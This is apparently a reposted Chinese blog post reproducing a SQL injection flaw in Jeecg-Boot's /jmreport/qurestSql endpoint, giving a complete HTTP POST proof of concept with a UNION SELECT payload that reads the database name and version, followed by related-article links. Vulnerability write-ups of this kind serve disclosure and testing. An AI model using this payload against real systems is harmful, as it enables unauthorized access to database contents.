Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现

9月前作者：LZ_KaiHuang 分类：Toy博客阅读(62) 违法举报

这篇具有很好参考价值的文章主要介绍了Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

一、Jeecg-Boot介绍

JeecgBoot 是一款基于代码生成器的低代码开发平台！前后端分离架构 SpringBoot2.x，SpringCloud，Ant Design&Vue，Mybatis-plus，Shiro，JWT，支持微服务。强大的代码生成器让前后端代码一键生成，实现低代码开发! JeecgBoot 引领新的低代码开发模式(OnlineCoding-> 代码生成器-> 手工MERGE)，帮助解决Java项目70%的重复工作，让开发更多关注业务。既能快速提高效率，节省研发成本，同时又不失灵活性。

二、漏洞复现

Jeecg-Boot 的/jeecg-boot/jmreport/qurestSql接口存在sql注入漏洞，url访问 /jeecg-boot/jmreport/qurestSql出现如下页面

Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现,sql,数据库开启抓包工具，修改请求报文方式为POST，并修改数据包，执行查询出了目标数据库名称和数据库版本。

Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现,sql,数据库

POC如下：文章来源地址https://www.toymoban.com/news/detail-706027.html

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xx.xx.xx.xx:xxxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 131

{"apiSelectId": "1290104038414721025", "id": "1' union all select 1,2,database(),version(),5,6,7 from rep_demo_gongsi where id='1"}

到了这里，关于Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

Jeecg-Boot 集成Activiti 6 （含源码）

本项目是2020 年集成的，采用的是当时版本的Jeecg-Boot，集成时请注意版本。 Jeecg-Boot 免费版没有工作流，于是我简单集成了一套，并且运用于公司项目中。论坛中的Activiti 功能介绍，都来自该代码。本项目中是多租户模式，如不需要多租户将想要接口中tenantId 赋值删除即可

2024年02月16日
浏览(58)
Jeecg-Boot 未授权SQL注入漏洞（CVE-2023-1454）

原创文章创作不易,个人博客charis3306.top JDK: 1.8+ (小于11) Maven: 3.5+ MySql: 5.7+ Redis: 3.2 + Node Js: 10.0 + Npm: 5.6.0+ Yarn: 1.21.1+ 下载源码后端源码 https://github.com/jeecgboot/jeecg-boot/tree/v3.5.0 前端源码 https://github.com/jeecgboot/jeecgboot-vue3 安装手册 http://doc.jeecg.com/2043871 下载完成后放在bc中。

2024年02月05日
浏览(43)
基于jeecg-boot的flowable流程跳转功能实现

更多nbcio-boot功能请看演示系统 gitee源代码地址后端代码： https://gitee.com/nbacheng/nbcio-boot 前端代码：https://gitee.com/nbacheng/nbcio-vue.git 在线演示（包括H5）： http://122.227.135.243:9888 今天我们实现nbcio-boot的flowable的流程跳转功能。一、前端实现界面实现，就是点击跳转出来

2024年02月11日
浏览(44)
基于jeecg-boot的flowable流程加签功能实现

更多nbcio-boot功能请看演示系统 gitee源代码地址后端代码： https://gitee.com/nbacheng/nbcio-boot 前端代码：https://gitee.com/nbacheng/nbcio-vue.git 在线演示（包括H5）： http://122.227.135.243:9888 今天我们实现nbcio-boot的flowable的流程加签功能。一、加签的几个概念 1、向前加签任务在

2024年02月11日
浏览(56)
【vue】vue中Mixins的用法（jeecg-boot为例）：

一、jeecg-boot本身只有JeecgListMixin.js Mixin是为将页面的一些公共方法放在一起处理（节省重复性代码，方便维护）优先级：页面里面的方法 Mixin里面的方法=》所以维护时要注意查找二、使用Mixin: 注意: 这里import 导入的js文件，要在js文件里面有导出三、mixins详解：【1】由

2024年02月14日
浏览(49)
记录一下基于jeecg-boot3.0的待办消息移植记录

因为之前没有记录，所以还要看代码进行寻找，比较费劲，所以今天记录一下： 1、后端 SysAnnouncementController 下面函数增加待办的几个显示内容给前端用具体代码如下： 2、前端 HeaderNotice.vue 文件获取系统消息里增加待办内容同时显示的地方做调整，包括样式与内容

2024年02月12日
浏览(49)
Jeecg-Boot 存在前台SQL注入漏洞（CVE-2023-1454）

微信公众号搜索：南风漏洞复现文库南风网络安全公众号首发 eecgBoot是一款基于BPM的低代码平台！前后端分离架构 SpringBoot 2.x，SpringCloud，Ant DesignVue，Mybatis-plus，Shiro，JWT，支持微服务。强大的代码生成器让前后端代码一键生成，实现低代码开发#x

2024年02月06日
浏览(143)
基于jeecg-boot的flowable流程收回功能实现（全网首创功能）

更多nbcio-boot功能请看演示系统 gitee源代码地址后端代码： https://gitee.com/nbacheng/nbcio-boot 前端代码：https://gitee.com/nbacheng/nbcio-vue.git 在线演示（包括H5）： http://122.227.135.243:9888 对于之前的flowable流程，之前有撤回，拒绝，退回等功能，但都不能满足发起人对于

2024年02月12日
浏览(54)
基于jeecg-boot的nbcio-boot亿事达企业管理平台发布

目前这个演示系统与代码都同步，以后也尽量保持同步。更多功能看演示系统 gitee源代码地址后端代码： https://gitee.com/nbacheng/nbcio-boot 前端代码：https://gitee.com/nbacheng/nbcio-vue.git 在线演示（包括H5）： http://122.227.135.243:9888 这次主要更新增加的内容如下： 1、我的日历

2024年02月17日
浏览(49)
Jeecg-Boot 低代码开发平台之路（一） —— 开始从零学起

今天开始详细学习下 Jeecg-Boot 低代码开发平台，官方网站对该平台的介绍是如下。 JeecgBoot是一款基于BPM的低代码平台！前后端分离架构 SpringBoot 2.x，SpringCloud，Ant DesignVue，Mybatis-plus，Shiro，JWT，支持微服务。强大的代码生成器让前后端代码一键生成，实现低代码开发！ Jee

2023年04月08日
浏览(86)